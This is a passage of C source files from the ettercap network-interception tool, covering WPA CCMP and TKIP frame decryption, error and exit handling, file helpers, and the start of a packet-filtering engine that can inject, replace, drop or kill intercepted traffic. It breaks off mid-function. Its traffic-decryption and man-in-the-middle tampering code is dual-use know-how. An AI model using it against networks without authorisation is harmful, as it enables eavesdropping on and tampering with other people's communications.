redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* globals */ #define CCMP_DECRYPT(_i, _b, _b0, _enc, _a, _len, _ctx) { \ /* Decrypt, with counter */ \ _b0[14] = (u_int8)((_i >> 8) & 0xff); \ _b0[15] = (u_int8)(_i & 0xff); \ AES_encrypt(_b0, _b, _ctx); \ XOR_BLOCK(_enc, _b, _len); \ /* Authentication */ \ XOR_BLOCK(_a, _enc, _len); \ AES_encrypt(_a, _a, _ctx); \ } /* protos */ int wpa_ccmp_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa); static inline void get_PN(u_char *PN, u_char *data); static inline void get_BZERO(u_char *BZERO, u_char *mac, u_char *PN, size_t len); static inline void get_AAD(u_char *AAD, u_char *mac, u_char *BZERO); static int ccmp_decrypt(u_char *enc, u_char *BZERO, u_char *B, u_char *A, u_char *mic, size_t len, AES_KEY *ctx); /*******************************************/ /* * IEEE-802.11i-2004 8.3.3.1 */ int wpa_ccmp_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa) { u_char mic[WPA_CCMP_TRAILER]; u_char PN[6]; /* 48 bit Packet Number */ size_t data_len = len - sizeof(struct wpa_header); u_char AAD[AES_BLOCK_SIZE*2]; u_char BZERO[AES_BLOCK_SIZE], A[AES_BLOCK_SIZE], B[AES_BLOCK_SIZE]; u_char decbuf[len]; AES_KEY aes_ctx; if (len > UINT16_MAX) { return -E_NOTHANDLED; } /* init the AES with the decryption key from SA */ AES_set_encrypt_key(sa.decryption_key, 128, &aes_ctx); /* get the Packet Number */ get_PN(PN, data); /* get the BZERO */ memset(BZERO, 0, sizeof(BZERO)); get_BZERO(BZERO, mac, PN, data_len); /* get the Additional Authentication Data */ memset(AAD, 0, sizeof(AAD)); get_AAD(AAD, mac, BZERO); /* Start with the first block and AAD */ AES_encrypt(BZERO, A, &aes_ctx); XOR_BLOCK(A, AAD, AES_BLOCK_SIZE); AES_encrypt(A, A, &aes_ctx); XOR_BLOCK(A, AAD + AES_BLOCK_SIZE, AES_BLOCK_SIZE); AES_encrypt(A, A, &aes_ctx); BZERO[0] &= 0x07; BZERO[14] = BZERO[15] = 0; AES_encrypt(BZERO, B, &aes_ctx); /* get the MIC trailer. it is after the end of our packet */ memcpy(mic, data + len, WPA_CCMP_TRAILER); XOR_BLOCK(mic, B, WPA_CCMP_TRAILER); /* copy the encrypted data to the decryption buffer (skipping the wpa parameters) */ memcpy(decbuf, data + sizeof(struct wpa_header), len); /* decrypt the packet */ if (ccmp_decrypt(decbuf, BZERO, B, A, mic, len, &aes_ctx) != 0) { //DEBUG_MSG(D_VERBOSE, "WPA (CCMP) decryption failed, packet was skipped"); return -E_NOTHANDLED; } /* * copy the decrypted packet over the original one * overwriting the wpa header. this way the packet is * identical to a non-WPA one. */ memcpy(data, decbuf, len); /* * wipe out the remaining bytes at the end of the packets * we have moved the data over the wpa header and the MIC was left * at the end of the packet. */ memset(data + len - WPA_CCMP_TRAILER, 0, WPA_CCMP_TRAILER); return E_SUCCESS; } /* * IEEE-802.11i-2004 8.3.3.2 * * ---------------------------------------- * |PN0|PN1|Reserved|KeyId|PN2|PN3|PN4|PN5| * ---------------------------------------- */ static inline void get_PN(u_char *PN, u_char *data) { PN[0] = data[0]; PN[1] = data[1]; /* skip the reserved */ PN[2] = data[4]; PN[3] = data[5]; PN[4] = data[6]; PN[5] = data[7]; } static inline void get_BZERO(u_char *BZERO, u_char *mac, u_char *PN, size_t len) { BZERO[0] = 0x59; BZERO[1] = 0; /* this will be set later by the callee */ memcpy(BZERO + 2, mac + 10, ETH_ADDR_LEN); BZERO[8] = PN[5]; BZERO[9] = PN[4]; BZERO[10] = PN[3]; BZERO[11] = PN[2]; BZERO[12] = PN[1]; BZERO[13] = PN[0]; BZERO[14] = ( len >> 8 ) & 0xFF; BZERO[15] = ( len & 0xFF ); } static inline void get_AAD(u_char *AAD, u_char *mac, u_char *BZERO) { AAD[0] = 0; /* AAD length >> 8 */ AAD[1] = 0; /* this will be set below */ AAD[2] = mac[0] & 0x8f; AAD[3] = mac[1] & 0xc7; /* we know 3 addresses are contiguous */ memcpy(AAD + 4, mac + 4, 3 * ETH_ADDR_LEN); AAD[22] = mac[22] & 0x0F; AAD[23] = 0; /* all bits masked */ /* XXX - implement the case of AP to AP 4 addresses wifi header */ /* if WIFI_DATA | WIFI_BACON, we have a QoS Packet */ if ( (mac[0] & (0x80 | 0x08)) == 0x88 ) { AAD[24] = mac[24] & 0x0f; /* just priority bits */ AAD[25] = 0; BZERO[1] = AAD[24]; AAD[1] = 22 + 2; } else { memset(&AAD[24], 0, 2); BZERO[1] = 0; AAD[1] = 22; } } static int ccmp_decrypt(u_char *enc, u_char *BZERO, u_char *B, u_char *A, u_char *mic, size_t len, AES_KEY *ctx) { int i = 1; /* remove the trailer from the length */ len -= WPA_CCMP_TRAILER; while (len >= AES_BLOCK_SIZE) { CCMP_DECRYPT(i, B, BZERO, enc, A, AES_BLOCK_SIZE, ctx); enc += AES_BLOCK_SIZE; len -= AES_BLOCK_SIZE; i++; } /* last block */ if (len != 0) { CCMP_DECRYPT(i, B, BZERO, enc, A, len, ctx); } return memcmp(mic, A, WPA_CCMP_TRAILER); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_encryption_tkip.c000664 000000 000000 00000022472 13711276346 020314 0ustar00rootroot000000 000000 /* ettercap -- encryption functions Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* globals */ /* Note: copied from FreeBSD source code, RELENG 6, sys/net80211/ieee80211_crypto_tkip.c, 471 */ static const u_int16 Sbox[256] = { 0xC6A5, 0xF884, 0xEE99, 0xF68D, 0xFF0D, 0xD6BD, 0xDEB1, 0x9154, 0x6050, 0x0203, 0xCEA9, 0x567D, 0xE719, 0xB562, 0x4DE6, 0xEC9A, 0x8F45, 0x1F9D, 0x8940, 0xFA87, 0xEF15, 0xB2EB, 0x8EC9, 0xFB0B, 0x41EC, 0xB367, 0x5FFD, 0x45EA, 0x23BF, 0x53F7, 0xE496, 0x9B5B, 0x75C2, 0xE11C, 0x3DAE, 0x4C6A, 0x6C5A, 0x7E41, 0xF502, 0x834F, 0x685C, 0x51F4, 0xD134, 0xF908, 0xE293, 0xAB73, 0x6253, 0x2A3F, 0x080C, 0x9552, 0x4665, 0x9D5E, 0x3028, 0x37A1, 0x0A0F, 0x2FB5, 0x0E09, 0x2436, 0x1B9B, 0xDF3D, 0xCD26, 0x4E69, 0x7FCD, 0xEA9F, 0x121B, 0x1D9E, 0x5874, 0x342E, 0x362D, 0xDCB2, 0xB4EE, 0x5BFB, 0xA4F6, 0x764D, 0xB761, 0x7DCE, 0x527B, 0xDD3E, 0x5E71, 0x1397, 0xA6F5, 0xB968, 0x0000, 0xC12C, 0x4060, 0xE31F, 0x79C8, 0xB6ED, 0xD4BE, 0x8D46, 0x67D9, 0x724B, 0x94DE, 0x98D4, 0xB0E8, 0x854A, 0xBB6B, 0xC52A, 0x4FE5, 0xED16, 0x86C5, 0x9AD7, 0x6655, 0x1194, 0x8ACF, 0xE910, 0x0406, 0xFE81, 0xA0F0, 0x7844, 0x25BA, 0x4BE3, 0xA2F3, 0x5DFE, 0x80C0, 0x058A, 0x3FAD, 0x21BC, 0x7048, 0xF104, 0x63DF, 0x77C1, 0xAF75, 0x4263, 0x2030, 0xE51A, 0xFD0E, 0xBF6D, 0x814C, 0x1814, 0x2635, 0xC32F, 0xBEE1, 0x35A2, 0x88CC, 0x2E39, 0x9357, 0x55F2, 0xFC82, 0x7A47, 0xC8AC, 0xBAE7, 0x322B, 0xE695, 0xC0A0, 0x1998, 0x9ED1, 0xA37F, 0x4466, 0x547E, 0x3BAB, 0x0B83, 0x8CCA, 0xC729, 0x6BD3, 0x283C, 0xA779, 0xBCE2, 0x161D, 0xAD76, 0xDB3B, 0x6456, 0x744E, 0x141E, 0x92DB, 0x0C0A, 0x486C, 0xB8E4, 0x9F5D, 0xBD6E, 0x43EF, 0xC4A6, 0x39A8, 0x31A4, 0xD337, 0xF28B, 0xD532, 0x8B43, 0x6E59, 0xDAB7, 0x018C, 0xB164, 0x9CD2, 0x49E0, 0xD8B4, 0xACFA, 0xF307, 0xCF25, 0xCAAF, 0xF48E, 0x47E9, 0x1018, 0x6FD5, 0xF088, 0x4A6F, 0x5C72, 0x3824, 0x57F1, 0x73C7, 0x9751, 0xCB23, 0xA17C, 0xE89C, 0x3E21, 0x96DD, 0x61DC, 0x0D86, 0x0F85, 0xE090, 0x7C42, 0x71C4, 0xCCAA, 0x90D8, 0x0605, 0xF701, 0x1C12, 0xC2A3, 0x6A5F, 0xAEF9, 0x69D0, 0x1791, 0x9958, 0x3A27, 0x27B9, 0xD938, 0xEB13, 0x2BB3, 0x2233, 0xD2BB, 0xA970, 0x0789, 0x33A7, 0x2DB6, 0x3C22, 0x1592, 0xC920, 0x8749, 0xAAFF, 0x5078, 0xA57A, 0x038F, 0x59F8, 0x0980, 0x1A17, 0x65DA, 0xD731, 0x84C6, 0xD0B8, 0x82C3, 0x29B0, 0x5A77, 0x1E11, 0x7BCB, 0xA8FC, 0x6DD6, 0x2C3A, }; #define TKIP_TA_OFFSET 10 #define TKIP_PHASE1_LOOP_COUNT 8 #define TKIP_TTAK_LEN 6 #define TKIP_WEP_128_KEY_LEN 16 /* 128 bit */ #define to_int16(hi, lo) ((u_int16)((lo) | (((u_int16)(hi)) << 8))) #define RotR1(val) ((u_int16)(((val) >> 1) | ((val) << 15))) #define Lo8(val) ((u_int8)((val) & 0xff)) #define Hi8(val) ((u_int8)((val) >> 8)) #define Lo16(val) ((u_int16)((val) & 0xffff)) #define Hi16(val) ((u_int16)((val) >> 16)) #define _S_(v) ((u_int16)(Sbox[Lo8(v)] ^ ((Sbox[Hi8(v)] << 8) | (Sbox[Hi8(v)] >> 8)))) #define pletohs(p) ((u_int16) \ ((u_int16)*((const u_int8 *)(p)+1)<<8| \ (u_int16)*((const u_int8 *)(p)+0)<<0)) #define Mk16_le(v) ((u_int16)pletohs(v)) /* protos */ int wpa_tkip_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa); static inline void get_TSC(u_int32 *TSC32, u_int16 *TSC16, u_char *data); static inline void tkip_mixing_phase1(u_int16 *TTAK, u_int8 *TK, u_int8 *TA, u_int32 TSC32); static inline void tkip_mixing_phase2(u_int8 *WEP, u_int8 *TK, u_int16 *TTAK, u_int16 TSC16); static int tkip_decrypt(u_char *decbuf, size_t len, u_int8 *wep_seed); /*******************************************/ /* * IEEE-802.11i-2004 8.3.2.1 */ int wpa_tkip_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa) { u_int32 TSC32; /* TKIP Sequence Counter ( 2, 3, 4, 5 ) */ u_int16 TSC16; /* TKIP Sequence Counter ( 1, 0 ) */ u_int16 TTAK[TKIP_TTAK_LEN]; u_int8 wep_seed[TKIP_WEP_128_KEY_LEN]; u_char decbuf[len]; if (len > UINT16_MAX) { return -E_NOTHANDLED; } /* get the TKIP Sequence Counter */ get_TSC(&TSC32, &TSC16, data); memset(TTAK, 0, sizeof(TTAK)); /* create the seed for the WEP decryption */ tkip_mixing_phase1(TTAK, sa.decryption_key, mac + TKIP_TA_OFFSET, TSC32); tkip_mixing_phase2(wep_seed, sa.decryption_key, TTAK, TSC16); /* copy the encrypted data to the decryption buffer (skipping the wpa parameters) */ memcpy(decbuf, data + sizeof(struct wpa_header), len); /* decrypt the packet */ if (tkip_decrypt(decbuf, len - WEP_CRC_LEN, wep_seed) != 0) { //DEBUG_MSG(D_VERBOSE, "WPA (TKIP) decryption failed, packet was skipped"); return -E_NOTHANDLED; } /* * copy the decrypted packet over the original one * overwriting the wpa header. this way the packet is * identical to a non-WPA one. */ memcpy(data, decbuf, len); /* * wipe out the remaining bytes at the end of the packets * we have moved the data over the wpa header and the WEP crc was left * at the end of the packet. */ memset(data + len - WEP_CRC_LEN, 0, WEP_CRC_LEN); return E_SUCCESS; } /* * IEEE-802.11i-2004 8.3.2.2 * * ------------------------------------------------ * |TSC1|WEPSeed|TSC0|Reserved|TSC2|TSC3|TSC4|TSC5| * ------------------------------------------------ */ static inline void get_TSC(u_int32 *TSC32, u_int16 *TSC16, u_char *data) { *TSC16 = to_int16(data[0], data[2]); *TSC32 = ( (u_int32)(data[7]) << 24 ) | ( (u_int32)(data[6]) << 16 ) | ( (u_int32)(data[5]) << 8 ) | ( (u_int32)(data[4]) ); } /* * IEEE-802.11i-2004 8.3.2.5 */ static inline void tkip_mixing_phase1(u_int16 *TTAK, u_int8 *TK, u_int8 *TA, u_int32 TSC32) { u_int16 i, j; /* Initialize the 80-bit TTAK from TSC (TSC32) and TA[0..5] */ TTAK[0] = Lo16(TSC32); TTAK[1] = Hi16(TSC32); TTAK[2] = to_int16(TA[1], TA[0]); TTAK[3] = to_int16(TA[3], TA[2]); TTAK[4] = to_int16(TA[5], TA[4]); for (i = 0; i < TKIP_PHASE1_LOOP_COUNT; i++) { j = (u_int16)(2 * (i & 1)); TTAK[0] = (u_int16)(TTAK[0] + _S_((u_int16)(TTAK[4] ^ to_int16(TK[1 + j], TK[0 + j])))); TTAK[1] = (u_int16)(TTAK[1] + _S_((u_int16)(TTAK[0] ^ to_int16(TK[5 + j], TK[4 + j])))); TTAK[2] = (u_int16)(TTAK[2] + _S_((u_int16)(TTAK[1] ^ to_int16(TK[9 + j], TK[8 + j])))); TTAK[3] = (u_int16)(TTAK[3] + _S_((u_int16)(TTAK[2] ^ to_int16(TK[13 + j], TK[12 + j])))); TTAK[4] = (u_int16)(TTAK[4] + _S_((u_int16)(TTAK[3] ^ to_int16(TK[1 + j], TK[0 + j]))) + i); } } static inline void tkip_mixing_phase2(u_int8 *WEP, u_int8 *TK, u_int16 *TTAK, u_int16 TSC16) { int i; TTAK[5] = (u_int16)(TTAK[4] + TSC16); /* Step 2 - 96-bit bijective mixing using S-box */ TTAK[0] = (u_int16)(TTAK[0] + _S_((u_int16)(TTAK[5] ^ Mk16_le(&TK[0])))); TTAK[1] = (u_int16)(TTAK[1] + _S_((u_int16)(TTAK[0] ^ Mk16_le(&TK[2])))); TTAK[2] = (u_int16)(TTAK[2] + _S_((u_int16)(TTAK[1] ^ Mk16_le(&TK[4])))); TTAK[3] = (u_int16)(TTAK[3] + _S_((u_int16)(TTAK[2] ^ Mk16_le(&TK[6])))); TTAK[4] = (u_int16)(TTAK[4] + _S_((u_int16)(TTAK[3] ^ Mk16_le(&TK[8])))); TTAK[5] = (u_int16)(TTAK[5] + _S_((u_int16)(TTAK[4] ^ Mk16_le(&TK[10])))); TTAK[0] = (u_int16)(TTAK[0] + RotR1((u_int16)(TTAK[5] ^ Mk16_le(&TK[12])))); TTAK[1] = (u_int16)(TTAK[1] + RotR1((u_int16)(TTAK[0] ^ Mk16_le(&TK[14])))); TTAK[2] = (u_int16)(TTAK[2] + RotR1(TTAK[1])); TTAK[3] = (u_int16)(TTAK[3] + RotR1(TTAK[2])); TTAK[4] = (u_int16)(TTAK[4] + RotR1(TTAK[3])); TTAK[5] = (u_int16)(TTAK[5] + RotR1(TTAK[4])); /* * Step 3 - bring in last of TK bits, assign 24-bit WEP IV value * WEP[0..2] is transmitted as WEP IV */ WEP[0] = Hi8(TSC16); WEP[1] = (u_int8)((Hi8(TSC16) | 0x20) & 0x7F); WEP[2] = Lo8(TSC16); WEP[3] = Lo8((u_int16)((TTAK[5] ^ Mk16_le(&TK[0])) >> 1)); for (i = 0; i < 6; i++) { WEP[4 + (2 * i)] = Lo8(TTAK[i]); WEP[5 + (2 * i)] = Hi8(TTAK[i]); } } /* * decryption of tkip is like WEP, RC4 algorithm */ static int tkip_decrypt(u_char *decbuf, size_t len, u_int8 *wep_seed) { RC4_KEY key; /* initialize the RC4 key */ RC4_set_key(&key, TKIP_WEP_128_KEY_LEN, wep_seed); /* decrypt the frame (len + 4 byte of crc) */ RC4(&key, len + WEP_CRC_LEN, decbuf, decbuf); /* * check if the decryption was successful: * at the end of the packet there is a CRC check */ if (CRC_checksum(decbuf, len + WEP_CRC_LEN, CRC_INIT) != CRC_RESULT) { //DEBUG_MSG(D_VERBOSE, "WEP: invalid key, the packet was skipped\n"); return -E_NOTHANDLED; } return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_error.c000664 000000 000000 00000006170 13711276346 016221 0ustar00rootroot000000 000000 /* ettercap -- error handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define ERROR_MSG_LEN 200 void fatal_error_msg(char *message, ...); /*******************************************/ /* * raise an error */ void error_msg(char *file, const char *function, int line, char *message, ...) { va_list ap; char errmsg[ERROR_MSG_LEN + 1]; /* should be enough */ int err_code; #ifdef OS_WINDOWS err_code = GetLastError(); /* Most likely not a libc error */ if (err_code == 0) err_code = errno; #else err_code = errno; #endif va_start(ap, message); vsnprintf(errmsg, ERROR_MSG_LEN, message, ap); va_end(ap); DEBUG_MSG("ERROR : %d, %s\n[%s:%s:%d] %s \n", err_code, strerror(err_code), file, function, line, errmsg ); /* close the interface and display the error */ ui_cleanup(); fprintf(stderr, "ERROR : %d, %s\n[%s:%s:%d]\n\n %s \n\n", err_code, strerror(err_code), file, function, line, errmsg ); clean_exit(-err_code); } /* * print a warning message (no exit) */ void warn_msg(char *file, const char *function, int line, char *message, ...) { va_list ap; char warnmsg[ERROR_MSG_LEN + 1]; va_start(ap, message); vsnprintf(warnmsg, ERROR_MSG_LEN, message, ap); va_end(ap); DEBUG_MSG("WARNING: [%s:%s:%d] %s \n", file, function, line, warnmsg); fprintf(stdout, "WARNING: [%s:%s:%d]\n\n %s \n\n", file, function, line, warnmsg); } /* * raise a fatal error */ void fatal_error(char *message, ...) { va_list ap; char errmsg[ERROR_MSG_LEN + 1]; /* should be enough */ va_start(ap, message); vsnprintf(errmsg, ERROR_MSG_LEN, message, ap); va_end(ap); /* if debug was initialized... */ #ifdef DEBUG if (debug_file != NULL) DEBUG_MSG("FATAL: %s", errmsg); #endif /* invoke the ui method */ ui_fatal_error(errmsg); /* the ui should exits, but to be sure... */ clean_exit(-1); } /* * used in sanity check * it represent a BUG in the software */ void bug(char *file, const char *function, int line, char *message) { DEBUG_MSG("BUG : [%s:%s:%d] %s \n", file, function, line, message ); /* close the interface and display the error */ ui_cleanup(); fprintf(stderr, "\n\nBUG at [%s:%s:%d]\n\n %s \n\n", file, function, line, message ); clean_exit(-666); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_exit.c000664 000000 000000 00000003013 13711276346 016032 0ustar00rootroot000000 000000 /* ettercap -- everything starts from this file... Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #ifdef HAVE_EC_LUA #include #endif /* * cleanly exit from the program */ void clean_exit(int errcode) { DEBUG_MSG("clean_exit: %d", errcode); INSTANT_USER_MSG("\nTerminating %s...\n", EC_GBL_PROGRAM); #ifdef HAVE_EC_LUA /* Cleanup lua */ ec_lua_fini(); #endif /* flush the exit message */ ui_msg_flush(MSG_ALL); /* stop the mitm attack */ mitm_stop(); /* terminate the sniffing engine */ EXECUTE(EC_GBL_SNIFF->cleanup); /* kill all the running threads but the current */ ec_thread_kill_all(); /* close the UI */ ui_cleanup(); /* call all the ATEXIT functions */ exit(errcode); } ettercap-0.8.3.1/src/ec_file.c000664 000000 000000 00000005112 13711276346 016002 0ustar00rootroot000000 000000 /* ettercap -- data handling module (fingerprints databases etc) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /*******************************************/ /* * add the prefix to a given filename */ char * get_full_path(const char *dir, const char *file) { char *filename; int len = 256; SAFE_CALLOC(filename, len, sizeof(char)); if (!strcmp(dir, "etc")) snprintf(filename, len, "%s/%s/%s", INSTALL_SYSCONFDIR, PROGRAM, file); else if (!strcmp(dir, "share")) snprintf(filename, len, "%s/%s/%s", INSTALL_DATADIR, PROGRAM, file); DEBUG_MSG("get_full_path -- [%s] %s", dir, filename); return filename; } /* * add the local path to a given filename */ char * get_local_path(const char *file) { char *filename; #ifdef OS_WINDOWS /* get the path in which ettercap is running */ const char *self_root = ec_win_get_ec_dir(); #else char *self_root = "."; #endif SAFE_CALLOC(filename, strlen(self_root) + strlen("/share/") + strlen(file) + 1, sizeof(char)); snprintf(filename, strlen(self_root)+strlen("/share/") + strlen(file) + 1, "%s/share/%s", self_root, file); DEBUG_MSG("get_local_path -- %s", filename); return filename; } /* * opens a file in the share directory. * first look in the installation path, then locally. */ FILE * open_data(char *dir, char *file, char *mode) { FILE *fd; char *filename = NULL; filename = get_full_path(dir, file); DEBUG_MSG("open_data (%s)", filename); fd = fopen(filename, mode); if (fd == NULL) { SAFE_FREE(filename); filename = get_local_path(file); DEBUG_MSG("open_data dropping to %s", filename); fd = fopen(filename, mode); /* don't check the fd, it is done by the caller */ } SAFE_FREE(filename); return fd; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_filter.c000664 000000 000000 00000120541 13711276346 016354 0ustar00rootroot000000 000000 /* ettercap -- content filtering engine module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #ifdef HAVE_PCRE #include #endif #define JIT_FAULT(x, ...) do { USER_MSG("JIT FILTER FAULT: " x "\n", ## __VA_ARGS__); return -E_FATAL; } while(0) /* since we need a recursive mutex, we cannot initialize it here statically */ static pthread_mutex_t filters_mutex; #define FILTERS_LOCK do{ pthread_mutex_lock(&filters_mutex); }while(0) #define FILTERS_UNLOCK do{ pthread_mutex_unlock(&filters_mutex); }while(0) /* protos */ static void reconstruct_strings(struct filter_env *fenv, struct filter_header *fh); static int compile_regex(struct filter_env *fenv); static int filter_engine(struct filter_op *fop, struct packet_object *po); static int execute_test(struct filter_op *fop, struct packet_object *po); static int execute_assign(struct filter_op *fop, struct packet_object *po); static int execute_incdec(struct filter_op *fop, struct packet_object *po); static int execute_func(struct filter_op *fop, struct packet_object *po); static int func_search(struct filter_op *fop, struct packet_object *po); static int func_regex(struct filter_op *fop, struct packet_object *po); static int func_pcre(struct filter_op *fop, struct packet_object *po); static int func_replace(struct filter_op *fop, struct packet_object *po); static int func_inject(struct filter_op *fop, struct packet_object *po); static int func_execinject(struct filter_op *fop, struct packet_object *po); static int func_execreplace(struct filter_op *fop, struct packet_object *po); static int func_log(struct filter_op *fop, struct packet_object *po); static int func_drop(struct packet_object *po); static int func_kill(struct packet_object *po); static int func_exec(struct filter_op *fop); static int cmp_eq(u_int32 a, u_int32 b); static int cmp_neq(u_int32 a, u_int32 b); static int cmp_lt(u_int32 a, u_int32 b); static int cmp_gt(u_int32 a, u_int32 b); static int cmp_leq(u_int32 a, u_int32 b); static int cmp_geq(u_int32 a, u_int32 b); /*******************************************/ /* initialize the filter mutex */ void filter_init_mutex(void) { pthread_mutexattr_t at; pthread_mutexattr_init(&at); /* we want an recursive mutex, so we can re-acquire it in the same thread */ pthread_mutexattr_settype(&at, PTHREAD_MUTEX_RECURSIVE_NP); pthread_mutex_init(&filters_mutex, &at); } /* * JIT interpreter for binary filters. * it process the filter_ops and apply the instructions * on the given packet object */ static int filter_engine(struct filter_op *fop, struct packet_object *po) { u_int32 eip = 0; u_int32 flags = 0; #define FLAG_FALSE 0 #define FLAG_TRUE 1 /* sanity check */ BUG_IF(fop == NULL); FILTERS_LOCK; /* loop until EXIT */ while (fop[eip].opcode != FOP_EXIT) { switch (fop[eip].opcode) { case FOP_TEST: if (execute_test(&fop[eip], po) == FLAG_TRUE) flags |= FLAG_TRUE; else flags &= ~(FLAG_TRUE); break; case FOP_ASSIGN: execute_assign(&fop[eip], po); /* assignment always returns true */ flags |= FLAG_TRUE; break; case FOP_INC: case FOP_DEC: execute_incdec(&fop[eip], po); /* inc/dec always return true */ flags |= FLAG_TRUE; break; case FOP_FUNC: if (execute_func(&fop[eip], po) == FLAG_TRUE) flags |= FLAG_TRUE; else flags &= ~(FLAG_TRUE); break; case FOP_JMP: /* jump the the next eip */ eip = fop[eip].op.jmp; continue; break; case FOP_JTRUE: /* jump the the next eip if the TRUE FLAG is set*/ if (flags & FLAG_TRUE) { eip = fop[eip].op.jmp; continue; } break; case FOP_JFALSE: /* jump the the next eip if the TRUE FLAG is NOT set */ if (!(flags & FLAG_TRUE)) { eip = fop[eip].op.jmp; continue; } break; default: FILTERS_UNLOCK; JIT_FAULT("unsupported opcode [%d] (execution interrupted)", fop[eip].opcode); break; } /* autoincrement the instruction pointer */ eip++; } FILTERS_UNLOCK; return 0; } /* * pass a packet through every (enabled) filter loaded */ void filter_packet(struct packet_object *po) { struct filter_list **l; for (l = EC_GBL_FILTERS; *l != NULL; l = &(*l)->next) { /* if a script drops the packet, do not present it to following scripts */ if ( po->flags & PO_DROPPED ) break; /* check whether the filter script is enabled */ if ((*l)->enabled) filter_engine((*l)->env.chain, po); } } /* * execute a function. * return FLAG_TRUE if the function was successful */ static int execute_func(struct filter_op *fop, struct packet_object *po) { switch (fop->op.func.op) { case FFUNC_SEARCH: /* search the string */ if (func_search(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_REGEX: /* search the string with a regex */ if (func_regex(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_PCRE: /* evaluate a perl regex */ if (func_pcre(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_REPLACE: /* replace the string */ if (func_replace(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_INJECT: /* replace the string */ if (func_inject(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_EXECINJECT: /* replace the string through output of a executable */ if (func_execinject(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_EXECREPLACE: /* replace the string through output of a executable */ if (func_execreplace(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_LOG: /* log the packet */ if (func_log(fop, po) == E_SUCCESS) return FLAG_TRUE; break; case FFUNC_DROP: /* drop the packet */ func_drop(po); return FLAG_TRUE; break; case FFUNC_KILL: /* kill the connection */ func_kill(po); return FLAG_TRUE; break; case FFUNC_MSG: /* display the message to the user */ USER_MSG("%s\n", fop->op.func.string); return FLAG_TRUE; break; case FFUNC_EXEC: /* execute the command */ if (func_exec(fop) == E_SUCCESS) return FLAG_TRUE; break; default: JIT_FAULT("unsupported function [%d]", fop->op.func.op); break; } return FLAG_FALSE; } /* * execute a test. * return FLAG_TRUE if the test was successful */ static int execute_test(struct filter_op *fop, struct packet_object *po) { /* initialize to the beginning of the packet */ u_char *base = po->L2.header; int (*cmp_func)(u_int32, u_int32) = &cmp_eq; /* * point to the right base. * if the test is L3.ttl, we have to start from * L3.header to count for offset. */ switch (fop->op.test.level) { case 2: base = po->L2.header; break; case 3: base = po->L3.header; break; case 4: base = po->L4.header; break; case 5: base = po->DATA.data; break; case 6: base = po->DATA.disp_data; break; default: JIT_FAULT("unsupported test level [%d]", fop->op.test.level); break; } /* set the pointer to the comparison function */ switch(fop->op.test.op) { case FTEST_EQ: cmp_func = &cmp_eq; break; case FTEST_NEQ: cmp_func = &cmp_neq; break; case FTEST_LT: cmp_func = &cmp_lt; break; case FTEST_GT: cmp_func = &cmp_gt; break; case 